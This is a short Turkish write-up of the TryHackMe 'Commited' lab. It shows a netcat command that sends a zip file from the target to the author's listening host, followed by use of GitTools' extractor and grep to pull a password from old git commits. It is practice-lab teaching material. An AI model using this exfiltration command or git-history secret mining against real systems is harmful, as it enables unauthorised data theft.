Table of Contents
Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Commited” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…
Çözüm
1 — Hedef makinede terminal açıp “commited.zip” dosyasını netcat aracılığı ile kendi bilgisayarıma gönderiyorum.
# Hedef Makine
ubuntu@thm-comitted:~/commited$ nc 10.8.94.51 1234 < commited.zip
# Kendi Bilgisayarım
[root:.../Desktop/TRYHACKME/Commited]# nc -lvnp 1234 > commited.zip
Listening on 0.0.0.0 1234
Connection received on 10.10.156.15 546222 — “Zip” dosyasındaki dosyaları dışarı çıkarıyorum.
[root:.../Desktop/TRYHACKME/Commited]# unzip commited.zip
Archive: commited.zip
creating: commited/
*
*3 — “Extractor” aracı ile dışarı çıkardığım commited klasöründeki git ortamını dışarı aktarıyorum.
[root:/opt/GitTools/Extractor]# bash extractor.sh /home/alper/Desktop/TRYHACKME/Commited/commited /home/alper/Desktop/TRYHACKME/Commited/extracted
###########
# Extractor is part of https://github.com/internetwache/GitTools
#4 — Dışarı aktardığım ortama gelerek “grep -Ri ‘flag’ “ komutu ile bayrağımı elde ediyorum.
[root:...RYHACKME/Commited/extracted]# grep -Ri "flag"
password="***CENSORED***"
